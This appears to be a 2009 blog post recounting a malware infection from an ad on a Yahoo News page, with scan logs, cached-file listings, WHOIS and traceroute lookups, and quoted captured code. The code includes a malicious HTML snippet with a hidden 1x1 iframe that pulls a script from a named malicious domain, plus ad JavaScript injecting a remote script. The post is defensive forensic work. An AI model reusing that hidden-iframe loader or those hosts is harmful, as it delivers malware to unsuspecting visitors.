Another virus infection, courtesy of Yahoo News

Major web sites like Yahoo.com and Boston.com are infecting thousands, if not hundred thousands of computers with trojans, back doors, and other viruses, through some of their ad service providers. When will the people in charge of these web sites wake up and start screening the ads that they are serving?

 

For the 2nd time in less than a week, I just spent 8 hours cleaning up my PC after a virus infection and doing some forensic analysis about where it came from. What I found gave me a bad headache.

Last night, in between compiling and testing, I read an article on Yahoo News about Obama’s science advisor and his strategies for fighting climate change. I am not giving you a link here.  Then my virus scanner popped up an alert:

The file was gone, but it was too late by then, the infection had already happened. CPU load was increasing, so I pulled the network cable and I fired up the Sysinternals Process Explorer to see what was going on. I saw a number of randomly named DLLs loaded from the /Windows/System32 folder. Deleting the files did not help, because new ones were created immedately, and revoking all permissions from the running threads did not help, either. I could not get rid of these rogue processes, and I had no idea what they were doing. So I turned off the power, booted Knoppicillin, and let Kaspersky, Avira, and BitDefender do a full scan over night. The results were meager, and I will share them here:

//
//Kaspersky Antivirus Scanner scan report
//
[09/04/09 09:31:39 I] Kaspersky Anti-Virus On-Demand Scanner for Linux. Version 5.7.20/RELEASE build #29, compiled Jul 25 2008, 13:21:47
[09/04/09 09:31:39 I] Copyright (C) Kaspersky Lab, 1997-2007.
[09/04/09 09:31:54 I] There are 1830965 records loaded, the latest update 09-04-2009, using standard bases set
[09/04/09 09:31:54 I] The scan path: /media/sdc1
[09/04/09 12:49:14 I] Scan summary: Files=171233 Folders=16955 Archives=5034 Packed=2063 Infected=0 Warnings=0 Suspicios=0 Cured=0 CureFailed=0 Corrupted=6 Protected=0 Error=0 ScanTime=03:17:18 ScanSpeed=5715.743 Kb/s

 //
// BitDefender Antivirus Scanner scan report
//
// Time: Thu Apr  9 06:41:08 2009
// Command line: --conf-file=/etc/BitDefender-scanner/bdscan.conf --archive-level=10 --log=/var/log/knoppicillin/20090409-0539-sdc1-BitDefender-scan.log.tmp --action=ignore /media/sdc1
// Core: AVCORE v1.0 (build 2337) (i386) (Oct 24 2006 15:58:21)
// Engines: scan: 17, unpack: 6, archive: 42, mail: 6
// Total signatures: 2845749
//

/media/sdc1/Quarant/bibepuru.dll infected: Gen:Trojan.Heur.Vundo.600CF3E3E3
/media/sdc1/Quarant/likarale.dll infected: Gen:Trojan.Heur.Vundo.600CF3E3E3
/media/sdc1/WINDOWS/SoftwareDistribution/Download/cb49fce0491f1a97e70eafea0ce76daa/BIT4E2.tmp=>dw20.msp bad crc
/media/sdc1/WINDOWS/system32/dudirake.dll infected: Gen:Trojan.Heur.Vundo.402CD3C3C3
/media/sdc1/WINDOWS/system32/hafomano.dll infected: Gen:Trojan.Heur.Vundo.402CD3C3C3
/media/sdc1/WINDOWS/system32/yuvuyezo.dll infected: Gen:Trojan.Heur.Vundo.402CD3C3C3
Results:
Folders           :16956
Files             :486181
Packed            :20266
Archives          :3014
Infected files    :5
Suspect files     :0
Warnings          :0
Identified viruses:2
I/O errors        :1
Files/second      :47
Scan time         :02:50:07

//
// Avira Antivir Scanner scan report
//

AntiVir / Linux Version 2.1.12-150
Copyright (c) 2008 by Avira GmbH.
All rights reserved.

Report erstellt am 09.04.2009 05:39:01

Kommandozeile: --alltypes -s -nolnk -ra -rs -r1 --alert-urls=yes --archive-max-recursion=50 --scan-mode=all -z --scan-in-mbox --heur-macro --heur-level=2 --exclude=/media/sdc1/INFECTED --moveto=/media/sdc1/INFECTED -rf/var/log/knoppicillin/20090409-0539-sdc1-Avira-AntiVir-scan.log /media/sdc1
VDF-Version: 7.1.3.34 erzeugt 08 Apr 2009

ALERT: [APPL/PsExec.F] /media/sdc1/Program Files/Sysinternals Suite/psexec.exe <<< Enthält Erkennungsmuster der Anwendung APPL/PsExec.F
ALERT-URL: http://www.avira.com/de/threats?q=APPL%2FPsExec%2EF
 Die Datei wurde verschoben.

--------- Suchergebnisse ---------
         Verzeichnisse:    16955
     Gescannte Dateien:   458771
                Alarme:        1
            Verdächtig:        0
             Repariert:        0
              Gelöscht:        0
             Umbenannt:        0
            Verschoben:        1
             Warnungen:        6
        Benötigte Zeit: 01:01:42
----------------------------------

(I apologize for the character encoding issues)
Only BitDefender found something (it found my copies of the DLLs, and the ones that were active). Avira did not like one of the Sysinternals programs. None of them found this file, also in the System32 folder: kerisudu, without extension.

Then I booted into the Recovery Console, ran FixMBR, just in case, and booted Windows XP again. The virus was active immediately, and I saw these randomly named DLLs appear in the System32 folder again. So I booted the Recovery Console once again and took the time to find and delete all suspicious files in several system folders. Then I rebooted and logged on with the administrator account, and the machine was clean. I then cleaned up the references to the deleted files in the registry, and started to look at the Temporary Internet Files folder, because I wanted to know if the virus had really come from an ad on the Yahoo page.

I was able to confirm that. I had not browsed any other page at the time in question, and the evidence was all still there. These are the files that were loaded and cached from this page, all with a timestamp of 11:06pm (the files that I identified as related to the infestation are in red):

C:\Documents and Settings\xxxx\Cookies
2009-04-08  23:06   1,869 xxxx@ad.yieldmanager[2].txt
2009-04-08  23:06     735 xxxx@zedo[1].txt

C:\Documents and Settings\xxxx\Local Settings\Temp
2009-04-08  23:06  70,656 e.exe   <== was downloaded as load[1].php

C:\Documents and Se...orary Internet Files\Content.IE5\5WY9B1QX
2009-04-08  23:06  24,890 5847529b094c7d6f84d648845da5cd92[1].swf
2009-04-08  23:06  13,407 capt.cefd91163.us_obama_science__dcsa102[1].jpg
2009-04-08  23:06   1,991 imp[3]
2009-04-08  23:06 141,994 sci_obama_science_adviser[1].htm
2009-04-08  23:06   1,177 template[2].txt
2009-04-08  23:06      82 tracksubprop[2].php
2009-04-08  23:06   3,046 videolthumb.01228.....31ae5b09c8c74fc4967[1].jpg
2009-04-08  23:06   1,170 vwaoiweuq[1].htm

C:\Documents and Se...orary Internet Files\Content.IE5\6Y1Z2NJI
2009-04-08  23:06   2,999 200x-1209600,http___d.yimg.com_a_p_umed.....jpg
2009-04-08  23:06   2,587 2ff49963a02da22da0071a9f8251b567[1].jpg
2009-04-08  23:06   4,396 64[1].pdf
2009-04-08  23:06   1,295 a[4].htm
2009-04-08  23:06     128 cached[3]
2009-04-08  23:06   2,810 fo[1].js
2009-04-08  23:06   1,177 template[2].txt
2009-04-08  23:06   3,562 _;ord=1239246364807648[1].htm

C:\Documents and Se...orary Internet Files\Content.IE5\GEAPH0QL
2009-04-08  23:06     407 753[1].htm
2009-04-08  23:06     922 imp[4]
2009-04-08  23:06  25,575 storycontextuals.....sc_sci_obama_science_adviser[1]
2009-04-08  23:06   3,228 videolthumb.000cf.....b16cbaa246499be677d6ad[1].jpg
2009-04-08  23:06   2,418 videolthumb.2eccd.....4989a11fddb0e8a6a6a3[1].jpg
2009-04-08  23:06     240 votaoiat[1].htm

C:\Documents and Se...orary Internet Files\Content.IE5\KCMJ55Y1
2009-04-08  23:06  36,115 300x250_leaves[1].swf
2009-04-08  23:06   1,301 a[1].htm
2009-04-08  23:06       0 CAROEMRF.HTM   <== was this emptied by the virus?
2009-04-08  23:06   1,640 fm[1].js
2009-04-08  23:06  70,656 load[1].php
2009-04-08  23:06   2,074 videolthumb.08248.....dac7fc0f2dd61[1].jpg

C:\WINDOWS\SoftwareDistribution\DataStore      <== I deleted this folder
2009-04-08  23:06  92,282,880 DataStore.edb    <== as a precaution

C:\WINDOWS\SoftwareDistribution\DataStore\Logs
2009-04-08  23:06    8,192 edb.chk
2009-04-08  23:06  131,072 edb.log

The exact sequence of events here is a bit difficult to determine, because there are numerous ad sites involved, Javascript, Flash, and PDF. I suspect that one of the ad links on the site loaded the file 64[1].pdf, but I don’t know which one. This file is infected and appears to exploit a script security hole in Acrobat (I may need to update my version of the viewer). Virustotal.com already knew this file (i.e. someone else had already submitted it for scanning) and reported the following:

I also found an obfuscated snippet of Javascript that, possible originating from the PDF/loaded by the PDF, that likely loaded the virus itself:

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY leftmargin=0 topmargin=0 rightmargin=0
   bottommargin=0 marginheight=0 marginwidth=0>
<a href="http://www.qzatawzawzwa.com/uyrtwqq/">
   <IMG src="banner2.gif" width="302" height="252" border="0"></a>
<iframe src="http://zeoztz.info/kt/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe>
</BODY>
</HTML>

VirusTotal did not like this:

The anchor link target (qzatawzawzwa.com) is a bogus domain, the IFrame domain (zeoztz.info) is interesting (do not attempt to load the URL). Now it was time to run some WHOIS searches:

Domain ID:D28236326-LRMS
Domain Name:ZEOZTZ.INFO
Created On:07-Apr-2009 04:04:09 UTC
Last Updated On:07-Apr-2009 04:08:06 UTC
Expiration Date:07-Apr-2010 04:04:09 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Registrant ID:GODA-062088235
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:ZEOZTZ.INFO@domainsbyproxy.com
[...]
Name Server:NS1.MYDYNDNS.ORG
Name Server:NS3.MYDYNDNS.ORG
Name Server:NS2.MYDYNDNS.ORG
Name Server:NS4.MYDYNDNS.ORG

This domain was registered anonymously with Godaddy just one day before I got infected (4/7)! We can probably assume that the perpetrators are in the US, or else they would have used a foreign registrar. And they are using a dynamic DNS service. Where is this domain hosted?

C:\>tracert ZEOZTZ.INFO

Tracing route to ZEOZTZ.INFO [66.135.37.21]
over a maximum of 30 hops:

 1   1 ms xxxx
 2   5 ms xxxx
 3   4 ms G11-0-0-1734.LCR-07.BSTNMA.verizon-gni.net [130.81.60.60]
 4   4 ms so-0-3-0-0.BB-RTR1.BOS.verizon-gni.net [130.81.29.252]
 5  15 ms so-9-1-0-0.BB-RTR1.NY325.verizon-gni.net [130.81.19.70]
 6  13 ms 0.so-4-3-0.XL3.NYC4.ALTER.NET [152.63.10.25]
 7  14 ms 0.ge-6-1-0.BR3.NYC4.ALTER.NET [152.63.3.166]
 8  15 ms xe-10-2-0.edge2.NewYork2.level3.net [4.68.110.233]
 9  14 ms vlan51.ebr1.NewYork2.Level3.net [4.69.138.222]
10  22 ms ae-3-3.ebr2.Washington1.Level3.net [4.69.132.89]
11  42 ms ae-82-82.csw3.Washington1.Level3.net [4.69.134.154]
12  39 ms ae-81-81.ebr1.Washington1.Level3.net [4.69.134.137]
13  39 ms ae-2.ebr3.Atlanta2.Level3.net [4.69.132.85]
14  73 ms ae-7.ebr3.Dallas1.Level3.net [4.69.134.21]
15  61 ms ae-63-63.csw1.Dallas1.Level3.net [4.69.136.154]
16 176 ms ae-13-69.car3.Dallas1.Level3.net [4.68.19.5]
17  58 ms PEER-1-NETW.car3.Dallas1.Level3.net [4.71.120.10]
18  66 ms 10ge-ten1-3.sat-8500v-cor-2.peer1.net [216.187.124.178]
19 208 ms 216.187.124.110
20  86 ms server1.advert-base.net [66.135.37.21]

Trace complete.

This IP address is hosted with Serverbeach in San Antonio, TX:

OrgName: ServerBeach
OrgID: SERVER-17
Address: 8500 Vicar Drive 8500, Suite 500
City: San Antonio
StateProv: TX
PostalCode: 78218
Country: US

NetRange: 66.135.32.0 - 66.135.63.255
CIDR: 66.135.32.0/19
NetName: SERVER-ALLOC-1
NetHandle: NET-66-135-32-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.SERVERBEACH.COM
NameServer: NS2.SERVERBEACH.COM
Comment:
RegDate: 2003-05-19
Updated: 2007-05-08

OrgAbuseHandle: SNAE-ARIN
OrgAbuseName: Serverbeach Network AUP Enforcement
OrgAbusePhone: +1-604-484-2588
OrgAbuseEmail: abuse@serverb.....com

OrgTechHandle: ZZ4092-ARIN
OrgTechName: ipadmin
OrgTechPhone: +1-210-225-4725
OrgTechEmail: ipadmin@serverb.....com

# ARIN WHOIS database, last updated 2009-04-08 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

This is a shared hosting server that likely was compromised and hijacked, using one of the known PHP security exploits. This lead ends here, and if I feel better again tomorrow, maybe I will write them an email. Eitherway, this server probably hosts the malware. I did not verify that, since I don’t have a sandbox environment to try it out. But my investigation was far from done.

The binary was downloaded and ended up in the cache as load[1].php. This file was somehow copied into the Local Settings/Temp folder as e.exe, and was executed from there. Believe it or not, this file has version information: BDA Monitor Application, Version 5, 6, 1215, 0, Internal name emmon.exe, Company eMPIA Technology, Inc. Of course I sent this to VirusTotal, which reported the following:

This is when I started to feel a bit sicklish. Once again, my virus scanners were totally in the dark about this threat. Avira, Kaspersky, and BitDefender did not find anything wrong with this file. Ikarus performed far better and recognized all three threats.

The following domain was referenced from one of the other Javascript snippets:

Domain ID:D28236327-LRMS
Domain Name:YWEQZA.INFO
Created On:07-Apr-2009 04:04:09 UTC
Last Updated On:07-Apr-2009 04:06:31 UTC
Expiration Date:07-Apr-2010 04:04:09 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Registrant ID:GODA-062088234
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:YWEQZA.INFO@domainsbyproxy.com
[...]
Name Server:NS1.MYDYNDNS.ORG
Name Server:NS3.MYDYNDNS.ORG
Name Server:NS2.MYDYNDNS.ORG
Name Server:NS4.MYDYNDNS.ORG

And then, there was this bit of Javascript:

//  Copyright (c) 2000-2009 ZEDO Inc. All Rights Reserved.

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(zzuid=='unknown')zzuid='y3j7BwoBACgAAC4LKCUAAACG';

var zzhasAd;

var zzpixie = new Image();

var zzStr = "s=0;u=y3j7BwoBACgAAC4LKCUAAACG;z=" + Math.random();

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
else{var zzIdxTrd = zzTrd;}
if (typeof zzIdxNw == 'undefined' || zzIdxNw.length == 0) { var zzIdxNw = ''; }
else { zzIdxNw = ';sn=' + zzIdxNw + ';';}
if (typeof zzIdxCh == 'undefined' || zzIdxCh.length == 0) { var zzIdxCh = ''; }
else { zzIdxCh = 'sc=' + zzIdxCh + ';';}
if (typeof zzIdxPub == 'undefined' || zzIdxPub.length == 0) { var zzIdxPub = ''; }
else { zzIdxPub = 'ss=' + zzIdxPub + ';';}
if (typeof zzIdxPos == 'undefined' || zzIdxPos.length == 0) { var zzIdxPos =''; }
else { zzIdxPos = 'si=' + zzIdxPos + ';';}
if (typeof zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}

/*

*/

document.write('<script language="javascript"
src="http://www.ads-solution.net/aclk/ads/b95fe080/id=140/"><\/script>');
document.write('<noscript><a href="http://www.ads-solution.net/aclk/ads/b95fe080/140/clk/" target="_blank">');
document.write('<img src="http://www.ads-solution.net/aclk/ads/b95fe080/140/dp/" width=300 height=250 border=0></a></noscript>');

The domain that is referenced at the end, ads-solution.net, is suspicious, because it is also new and does not seem to belong to a legitimate business. I cannot say what these links return – I did not want to try it a 2nd time. Maybe this was where it all started.

ads-solution.net
Registrant:
Domains by Proxy, Inc.

DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Registered through: GoDaddy.com, Inc.
Domain Name: ADS-SOLUTION.NET
Created on: 06-Apr-09
Expires on: 06-Apr-10
Last Updated on: 06-Apr-09

Domain servers in listed order:
DNS1.NETTICA.COM
DNS2.NETTICA.COM
DNS3.NETTICA.COM
DNS4.NETTICA.COM
DNS5.NETTICA.COM

Nettica appears to be a hosting provider, and since they use the official DNS servers for the ads-solution domain, the owner must be known to Nettica. One would think:

AboutUs: NETTICA.COM
Registrant:
Graham, Alan
Nettica Corporation
3130 Sugarloaf Parkway Ste 1100-150
Lawrenceville, GA 30045
US

Domain Name: NETTICA.COM

Administrative Contact, Technical Contact:
Graham, Alan support@nettica.com
Nettica Corporation
3130 Sugarloaf Parkway Ste 1100-150
Lawrenceville, GA 30045 US
678-344-8702 fax: 678-344-5021

Record expires on 17-May-2013.
Record created on 17-May-2003.
Database last updated on 9-Apr-2009 15:15:37 EDT.

Domain servers in listed order:

DNS1.NETTICA.COM 64.94.136.11
DNS2.NETTICA.COM 64.237.45.34
DNS3.NETTICA.COM 64.94.136.13
DNS4.NETTICA.COM 69.41.170.223
DNS5.NETTICA.COM 212.100.247.15

Registry Status: clientTransferProhibited

Shall we assume that Alan has something to do with this mess? Most certainly not. Nettica is just providing DNS service for the ads-solution.net domain.¹

As you can see, I uncovered a lot, but did not get quite to the bottom of this attack. The servers are still up, and who knows how many hundreds or thousands of people got infected. And who knows what this virus actually does … the thicket of online advertising is almost unpenetrable, and analyzing all the links and references from this one page on Yahoo would a lot longer than the one day I was willing to spare. What is really sickening about this, though, is that you are no longer safe on sites like Yahoo.com, even if you have a virus scanner, up-to-date software, and do everything you think is necessary to stay free of viruses, trojans, and root kits.

There is a lot more work to do, but I need to move on. Feel free to contact me if you know something that should be added.

¹ It is now midnight and it appears that that Nettica has removed the DNS record for ads-solution.net. The site is no longer reachable by the domain name.